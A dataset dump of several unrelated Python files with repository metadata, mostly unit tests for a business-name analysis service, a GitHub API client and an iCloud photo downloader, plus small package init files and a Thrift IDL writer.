headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG LTD. PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG INCORPORATED PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LIMITED PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG INC. PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG CORPORATION PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG CORP PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LTEE PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG INCORPOREE PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LIMITEE PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_MISPLACED, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_name_use_special_words_request_response(client, jwt, app):
words_list_classification = [{'word': 'BC', 'classification': 'DIST'},
{'word': 'BC', 'classification': 'DESC'},
#{'word': '468040', 'classification': 'DIST'},
{'word': 'COAST', 'classification': 'DIST'},
{'word': 'COAST', 'classification': 'DESC'},
{'word': 'TREASURY', 'classification': 'DISC'},
{'word': 'TREASURY', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'B C, B C S, BC, BC S, BCPROVINCE, BRITISH COLUMBIA, BRITISHCOLUMBIA, PROVINCIAL',
'consent_required': False, 'allow_use': True
},
{
'words': 'TREASURY',
'consent_required': False, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': '468040 BC LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'COAST ANGULARS TREASURY INCORPORATED',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.WORD_SPECIAL_USE, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_name_use_special_words_more_than_one_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'BIG', 'classification': 'DIST'},
{'word': 'BROS', 'classification': 'DIST'},
{'word': 'BROS', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'BIG BROS, BIG BROTHERS, BIG SISTERS',
'consent_required': False, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG BIG BROS PLUMBING LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.WORD_SPECIAL_USE, payload.get('issues'))
def save_words_list_classification(words_list):
from namex.models import WordClassification as WordClassificationDAO
for record in words_list:
wc = WordClassificationDAO()
wc.classification = record['classification']
wc.word = record['word']
wc.start_dt = date.today()
wc.approved_dt = date.today()
wc.save_to_db()
def save_words_list_virtual_word_condition(words_list):
from namex.models import VirtualWordCondition as VirtualWordConditionDAO
for record in words_list:
vwc = VirtualWordConditionDAO()
vwc.rc_words = record['words']
vwc.rc_consent_required = record['consent_required']
vwc.rc_allow_use = record['allow_use']
vwc.save_to_db()
def save_words_list_name(words_list):
from namex.models import Request as RequestDAO, State, Name as NameDAO
num = 0
req = 1460775
for record in words_list:
nr_num_label = 'NR 00000'
num += 1
req += 1
nr_num = nr_num_label + str(num)
nr = RequestDAO()
nr.nrNum = nr_num
nr.stateCd = State.APPROVED
nr.requestId = req
nr.requestTypeCd = EntityTypes.CORPORATION.value
name = NameDAO()
name.nr_id = nr.id
name.choice = 1
name.name = record
name.state = State.APPROVED
name.corpNum = '0652480'
nr.names = [name]
nr.save_to_db()
| 41.190259 | 137 | 0.560694 | 5,344 | 54,124 | 5.477358 | 0.069985 | 0.031362 | 0.03717 | 0.038263 | 0.872775 | 0.852038 | 0.838782 | 0.828089 | 0.823409 | 0.809778 | 0 | 0.004039 | 0.304615 | 54,124 | 1,313 | 138 | 41.22163 | 0.77368 | 0.042255 | 0 | 0.606005 | 0 | 0 | 0.251062 | 0.001718 | 0 | 0 | 0 | 0 | 0.079163 | 1 | 0.029117 | false | 0 | 0.009099 | 0 | 0.038217 | 0.045496 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c3adaf3ba357eb96bffdb6ccfcf29ff834072306 | 96 | py | Python | venv/lib/python3.8/site-packages/jeepney/auth.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/jeepney/auth.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/jeepney/auth.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/0e/1d/e7/b73b82734ada7887160ccfc60c02cdc0ba94b9e24ce281071ffa424130 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.40625 | 0 | 96 | 1 | 96 | 96 | 0.489583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c3ccfb9da5d5050c40c755ab857c94d011ffdfde | 93 | py | Python | phone.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | [
"bzip2-1.0.6"
] | null | null | null | phone.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | [
"bzip2-1.0.6"
] | null | null | null | phone.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | [
"bzip2-1.0.6"
] | null | null | null | p=input()
print(p[:2]+"-"+p[2:])
p=p[:2]+"-"+p[2:]
print(p[3:])
p=p.replace('-','')
print(p)
| 13.285714 | 22 | 0.451613 | 20 | 93 | 2.1 | 0.3 | 0.190476 | 0.214286 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057471 | 0.064516 | 93 | 6 | 23 | 15.5 | 0.425287 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
c3eeea70fc0fc8aae95b99ed2c3e6027946ec9aa | 47 | py | Python | pyxb/bundles/opengis/fes_2_0.py | eLBati/pyxb | 14737c23a125fd12c954823ad64fc4497816fae3 | [
"Apache-2.0"
] | 123 | 2015-01-12T06:43:22.000Z | 2022-03-20T18:06:46.000Z | pyxb/bundles/opengis/fes_2_0.py | eLBati/pyxb | 14737c23a125fd12c954823ad64fc4497816fae3 | [
"Apache-2.0"
] | 103 | 2015-01-08T18:35:57.000Z | 2022-01-18T01:44:14.000Z | pyxb/bundles/opengis/fes_2_0.py | eLBati/pyxb | 14737c23a125fd12c954823ad64fc4497816fae3 | [
"Apache-2.0"
] | 54 | 2015-02-15T17:12:00.000Z | 2022-03-07T23:02:32.000Z | from pyxb.bundles.opengis.raw.fes_2_0 import *
| 23.5 | 46 | 0.808511 | 9 | 47 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 0.085106 | 47 | 1 | 47 | 47 | 0.790698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
615b748005e7d035268d8d9680b688a0ea54284b | 96 | py | Python | pymediator/__init__.py | pirobtumen/pymediator | fb6b5017301e8197c5c521ce87a396510fe55542 | [
"BSD-3-Clause"
] | null | null | null | pymediator/__init__.py | pirobtumen/pymediator | fb6b5017301e8197c5c521ce87a396510fe55542 | [
"BSD-3-Clause"
] | null | null | null | pymediator/__init__.py | pirobtumen/pymediator | fb6b5017301e8197c5c521ce87a396510fe55542 | [
"BSD-3-Clause"
] | null | null | null | from .mediator import Mediator
from .event import Event
from .event_handler import EventHandler
| 24 | 39 | 0.84375 | 13 | 96 | 6.153846 | 0.461538 | 0.225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 96 | 3 | 40 | 32 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4eedb8e0eb1af53fab513b04a5589012d263b00a | 4,242 | py | Python | tests/namespaces/test_repos.py | odidev/aiogithubapi | ef0917e8da5d31f3c3e64d4efe45f05a537bcfdd | [
"MIT"
] | null | null | null | tests/namespaces/test_repos.py | odidev/aiogithubapi | ef0917e8da5d31f3c3e64d4efe45f05a537bcfdd | [
"MIT"
] | null | null | null | tests/namespaces/test_repos.py | odidev/aiogithubapi | ef0917e8da5d31f3c3e64d4efe45f05a537bcfdd | [
"MIT"
] | null | null | null | """Test repos namespace."""
# pylint: disable=missing-docstring
import pytest
from aiogithubapi import GitHubAPI, GitHubRepositoryModel
from aiogithubapi.const import HttpContentType
from tests.common import (
HEADERS,
HEADERS_TEXT,
TEST_REPOSITORY_NAME,
MockedRequests,
MockResponse,
)
@pytest.mark.asyncio
async def test_get_repository(github_api: GitHubAPI, mock_requests: MockedRequests):
response = await github_api.repos.get(TEST_REPOSITORY_NAME)
assert response.status == 200
assert isinstance(response.data, GitHubRepositoryModel)
assert response.data.name == "Hello-World"
assert mock_requests.called == 1
assert mock_requests.last_request["url"] == "https://api.github.com/repos/octocat/hello-world"
@pytest.mark.asyncio
async def test_list_commits(github_api: GitHubAPI, mock_requests: MockedRequests):
response = await github_api.repos.list_commits(TEST_REPOSITORY_NAME)
assert response.status == 200
assert isinstance(response.data, list)
assert response.data[0].commit.message == "Merge pull request #6"
assert mock_requests.called == 1
assert (
mock_requests.last_request["url"]
== "https://api.github.com/repos/octocat/hello-world/commits"
)
@pytest.mark.asyncio
async def test_list_tags(github_api: GitHubAPI, mock_requests: MockedRequests):
response = await github_api.repos.list_tags(TEST_REPOSITORY_NAME)
assert response.status == 200
assert isinstance(response.data, list)
assert response.data[0].name == "v0.1"
assert response.data[0].commit.sha == "c5b97d5ae6c19d5c5df71a34c7fbeeda2479ccbc"
assert mock_requests.called == 1
assert (
mock_requests.last_request["url"] == "https://api.github.com/repos/octocat/hello-world/tags"
)
@pytest.mark.asyncio
async def test_tarball(
github_api: GitHubAPI,
mock_requests: MockedRequests,
mock_response: MockResponse,
):
mock_response.mock_headers = {**HEADERS, "content-type": HttpContentType.BASE_GZIP}
response = await github_api.repos.tarball("octocat/hello-world")
assert isinstance(response.data, bytes)
assert mock_requests.called == 1
assert (
mock_requests.last_request["url"]
== "https://api.github.com/repos/octocat/hello-world/tarball/"
)
response = await github_api.repos.tarball("octocat/hello-world", ref="main")
assert isinstance(response.data, bytes)
assert mock_requests.called == 2
assert (
mock_requests.last_request["url"]
== "https://api.github.com/repos/octocat/hello-world/tarball/main"
)
@pytest.mark.asyncio
async def test_zipball(
github_api: GitHubAPI,
mock_requests: MockedRequests,
mock_response: MockResponse,
):
mock_response.mock_headers = {**HEADERS, "content-type": HttpContentType.BASE_ZIP}
response = await github_api.repos.zipball("octocat/hello-world")
assert isinstance(response.data, bytes)
assert mock_requests.called == 1
assert (
mock_requests.last_request["url"]
== "https://api.github.com/repos/octocat/hello-world/zipball/"
)
response = await github_api.repos.zipball("octocat/hello-world", ref="main")
assert isinstance(response.data, bytes)
assert mock_requests.called == 2
assert (
mock_requests.last_request["url"]
== "https://api.github.com/repos/octocat/hello-world/zipball/main"
)
@pytest.mark.asyncio
async def test_readme(
github_api: GitHubAPI,
mock_requests: MockedRequests,
mock_response: MockResponse,
):
mock_response.mock_headers = HEADERS_TEXT
response = await github_api.repos.readme(TEST_REPOSITORY_NAME)
assert response.status == 200
assert isinstance(response.data, str)
assert mock_requests.called == 1
assert (
mock_requests.last_request["url"]
== "https://api.github.com/repos/octocat/hello-world/readme/"
)
response = await github_api.repos.readme(TEST_REPOSITORY_NAME, dir="test")
assert response.status == 200
assert isinstance(response.data, str)
assert mock_requests.called == 2
assert (
mock_requests.last_request["url"]
== "https://api.github.com/repos/octocat/hello-world/readme/test"
)
| 34.209677 | 100 | 0.719236 | 513 | 4,242 | 5.783626 | 0.146199 | 0.097068 | 0.109201 | 0.066734 | 0.846983 | 0.836535 | 0.816987 | 0.772497 | 0.772497 | 0.698349 | 0 | 0.013563 | 0.165724 | 4,242 | 123 | 101 | 34.487805 | 0.824809 | 0.013201 | 0 | 0.52381 | 0 | 0 | 0.173206 | 0.009569 | 0 | 0 | 0 | 0 | 0.342857 | 1 | 0 | false | 0 | 0.038095 | 0 | 0.038095 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f6178b1a81e38b94879b7faab77a331d3e7a2bdb | 137 | py | Python | tests/test_basic.py | radoye/fastprogress | ee6234d1b22bb670a08e8c32cdbbc4cb4cba1d6c | [
"Apache-2.0"
] | 2 | 2018-12-31T06:08:58.000Z | 2019-01-03T10:11:14.000Z | tests/test_basic.py | radoye/fastprogress | ee6234d1b22bb670a08e8c32cdbbc4cb4cba1d6c | [
"Apache-2.0"
] | 1 | 2021-06-25T15:16:59.000Z | 2021-06-25T15:16:59.000Z | tests/test_basic.py | radoye/fastprogress | ee6234d1b22bb670a08e8c32cdbbc4cb4cba1d6c | [
"Apache-2.0"
] | 1 | 2018-12-30T10:35:51.000Z | 2018-12-30T10:35:51.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
import fastprogress
def test_basic():
assert fastprogress.__version__
| 13.7 | 35 | 0.708029 | 17 | 137 | 5.411765 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008696 | 0.160584 | 137 | 9 | 36 | 15.222222 | 0.791304 | 0.306569 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f63e254de6e27c78b3902a5fa4d08a9fd86b76ac | 5,119 | py | Python | tests/test_folder_structure.py | mkirkland4874/icloud_photos_downloader | 04f356dc6fda18a4b56e45160eb7d18850f6a4e8 | [
"MIT"
] | 1,514 | 2020-10-22T13:41:41.000Z | 2022-03-31T23:19:49.000Z | tests/test_folder_structure.py | mkirkland4874/icloud_photos_downloader | 04f356dc6fda18a4b56e45160eb7d18850f6a4e8 | [
"MIT"
] | 200 | 2020-10-21T17:10:12.000Z | 2022-03-31T14:44:48.000Z | tests/test_folder_structure.py | mkirkland4874/icloud_photos_downloader | 04f356dc6fda18a4b56e45160eb7d18850f6a4e8 | [
"MIT"
] | 147 | 2020-10-26T00:37:40.000Z | 2022-03-17T19:55:16.000Z | from unittest import TestCase
import os
from os.path import normpath
import shutil
from click.testing import CliRunner
from vcr import VCR
from icloudpd.base import main
from tests.helpers.print_result_exception import print_result_exception
import inspect
vcr = VCR(decode_compressed_response=True)
class FolderStructureTestCase(TestCase):
# This is basically a copy of the listing_recent_photos test #
def test_default_folder_structure(self):
base_dir = os.path.normpath(f"tests/fixtures/Photos/{inspect.stack()[0][3]}")
### Tests if the default directory structure is constructed correctly ###
if os.path.exists(base_dir):
shutil.rmtree(base_dir)
os.makedirs(base_dir)
# Note - This test uses the same cassette as test_download_photos.py
with vcr.use_cassette("tests/vcr_cassettes/listing_photos.yml"):
# Pass fixed client ID via environment variable
runner = CliRunner(env={
"CLIENT_ID": "DE309E26-942E-11E8-92F5-14109FE0B321"
})
result = runner.invoke(
main,
[
"--username",
"jdoe@gmail.com",
"--password",
"password1",
"--recent",
"5",
"--only-print-filenames",
"--no-progress-bar",
"-d",
base_dir,
],
)
print_result_exception(result)
filenames = result.output.splitlines()
self.assertEqual(len(filenames), 8)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("2018/07/31/IMG_7409.JPG")), filenames[0]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("2018/07/31/IMG_7409.MOV")), filenames[1]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7408.JPG")), filenames[2]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7408.MOV")), filenames[3]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7407.JPG")), filenames[4]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7407.MOV")), filenames[5]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7405.MOV")), filenames[6]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7404.MOV")), filenames[7]
)
assert result.exit_code == 0
def test_folder_structure_none(self):
base_dir = os.path.normpath(f"tests/fixtures/Photos/{inspect.stack()[0][3]}")
if os.path.exists(base_dir):
shutil.rmtree(base_dir)
os.makedirs(base_dir)
# Note - This test uses the same cassette as test_download_photos.py
with vcr.use_cassette("tests/vcr_cassettes/listing_photos.yml"):
# Pass fixed client ID via environment variable
runner = CliRunner(env={
"CLIENT_ID": "DE309E26-942E-11E8-92F5-14109FE0B321"
})
result = runner.invoke(
main,
[
"--username",
"jdoe@gmail.com",
"--password",
"password1",
"--recent",
"5",
"--only-print-filenames",
"--folder-structure=none",
"--no-progress-bar",
"-d",
base_dir,
],
)
print_result_exception(result)
filenames = result.output.splitlines()
self.assertEqual(len(filenames), 8)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("IMG_7409.JPG")), filenames[0]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("IMG_7409.MOV")), filenames[1]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("IMG_7408.JPG")), filenames[2]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("IMG_7408.MOV")), filenames[3]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("IMG_7407.JPG")), filenames[4]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("IMG_7407.MOV")), filenames[5]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("IMG_7405.MOV")), filenames[6]
)
self.assertEqual(
os.path.join(base_dir, os.path.normpath("IMG_7404.MOV")), filenames[7]
)
assert result.exit_code == 0
| 38.201493 | 97 | 0.530768 | 557 | 5,119 | 4.745063 | 0.219031 | 0.083995 | 0.068104 | 0.088536 | 0.823307 | 0.823307 | 0.823307 | 0.823307 | 0.823307 | 0.823307 | 0 | 0.060917 | 0.352217 | 5,119 | 133 | 98 | 38.488722 | 0.736128 | 0.068763 | 0 | 0.568966 | 0 | 0 | 0.15671 | 0.102861 | 0 | 0 | 0 | 0 | 0.172414 | 1 | 0.017241 | false | 0.034483 | 0.077586 | 0 | 0.103448 | 0.043103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f65fb8f94d2586b90611899957f8aa9e101e4168 | 160 | py | Python | config/__init__.py | microserv/Index-service | 9c4894f3802cf24950dfc952d24589d1bd107ae6 | [
"MIT"
] | null | null | null | config/__init__.py | microserv/Index-service | 9c4894f3802cf24950dfc952d24589d1bd107ae6 | [
"MIT"
] | null | null | null | config/__init__.py | microserv/Index-service | 9c4894f3802cf24950dfc952d24589d1bd107ae6 | [
"MIT"
] | null | null | null | from config.base import * # flake8: noqa
try:
from config.local import * # flake8: noqa
except ImportError:
print('Local settings file not found.')
| 20 | 46 | 0.69375 | 21 | 160 | 5.285714 | 0.714286 | 0.18018 | 0.288288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.2125 | 160 | 7 | 47 | 22.857143 | 0.865079 | 0.15625 | 0 | 0 | 0 | 0 | 0.229008 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0.2 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f671805cc46df49e12ec3a2604556c32f863a537 | 246 | py | Python | end_to_end_tests/golden-master/my_test_api_client/errors.py | Maistho/openapi-python-client | e123b966e8d31db173e09cabc8284a855d07e425 | [
"MIT"
] | null | null | null | end_to_end_tests/golden-master/my_test_api_client/errors.py | Maistho/openapi-python-client | e123b966e8d31db173e09cabc8284a855d07e425 | [
"MIT"
] | null | null | null | end_to_end_tests/golden-master/my_test_api_client/errors.py | Maistho/openapi-python-client | e123b966e8d31db173e09cabc8284a855d07e425 | [
"MIT"
] | null | null | null | from httpx import Response
class ApiResponseError(Exception):
""" An exception raised when an unknown response occurs """
def __init__(self, *, response: Response):
super().__init__()
self.response: Response = response
| 24.6 | 63 | 0.686992 | 26 | 246 | 6.192308 | 0.615385 | 0.298137 | 0.198758 | 0.298137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215447 | 246 | 9 | 64 | 27.333333 | 0.834197 | 0.207317 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
9caec5c328e068059387a1b4d5dc9e459d6c4b0c | 67 | py | Python | tests/test_main.py | arisp99/sphinx-toolbox | 2987080e2d65c0dd2d392dcf7f1f5a904a9231f5 | [
"MIT"
] | 30 | 2021-03-01T00:15:55.000Z | 2022-03-01T13:23:59.000Z | tests/test_main.py | arisp99/sphinx-toolbox | 2987080e2d65c0dd2d392dcf7f1f5a904a9231f5 | [
"MIT"
] | 56 | 2020-12-17T12:39:04.000Z | 2022-03-21T19:00:55.000Z | tests/test_main.py | arisp99/sphinx-toolbox | 2987080e2d65c0dd2d392dcf7f1f5a904a9231f5 | [
"MIT"
] | 4 | 2021-07-04T16:57:52.000Z | 2022-03-21T19:35:31.000Z | def test_import():
# this package
import sphinx_toolbox.__main__
| 16.75 | 31 | 0.791045 | 9 | 67 | 5.222222 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134328 | 67 | 3 | 32 | 22.333333 | 0.810345 | 0.179104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9cb4598d5b2c951d1f11546a977a1b1905f3b892 | 9,996 | py | Python | satori.ars/satori/ars/thrift/writer.py | Cloud11665/satori-git | ea1855a920c98b480423bf247bce6e5626985c4a | [
"MIT"
] | 4 | 2021-01-05T01:35:36.000Z | 2021-12-13T00:05:14.000Z | satori.ars/satori/ars/thrift/writer.py | Cloud11665/satori-git | ea1855a920c98b480423bf247bce6e5626985c4a | [
"MIT"
] | 2 | 2020-06-06T01:12:07.000Z | 2020-06-06T01:16:01.000Z | satori.ars/satori/ars/thrift/writer.py | Cloud11665/satori-git | ea1855a920c98b480423bf247bce6e5626985c4a | [
"MIT"
] | 2 | 2021-01-05T01:33:30.000Z | 2021-03-06T13:48:21.000Z | # vim:ts=4:sts=4:sw=4:expandtab
"""IDL writer for the Thrift protocol.
"""
from satori.ars.model import *
class ThriftWriter(object):
"""An ARS writer spitting out thrift IDL.
"""
ATOMIC_NAMES = {
ArsBinary: 'binary',
ArsBoolean: 'bool',
ArsInt8: 'byte',
ArsInt16: 'i16',
ArsInt32: 'i32',
ArsInt64: 'i64',
ArsFloat: 'double',
ArsString: 'string',
ArsVoid: 'void',
}
def _reference(self, item, target):
if isinstance(item, ArsAtomicType):
target.write(ThriftWriter.ATOMIC_NAMES[item])
elif isinstance(item, ArsList):
target.write('list<')
self._reference(item.element_type, target)
target.write('>')
elif isinstance(item, ArsMap):
target.write('map<')
self._reference(item.key_type, target)
target.write(',')
self._reference(item.value_type, target)
target.write('>')
elif isinstance(item, ArsSet):
target.write('set<')
self._reference(item.element_type, target)
target.write('>')
elif isinstance(item, ArsNamedElement):
target.write(item.name)
else:
raise RuntimeError("Unhandled Element type '{0}'".format(item.__class__.__name__))
# @DispatchOn(item=ArsElement)
# def _reference(self, item, target): # pylint: disable-msg=E0102
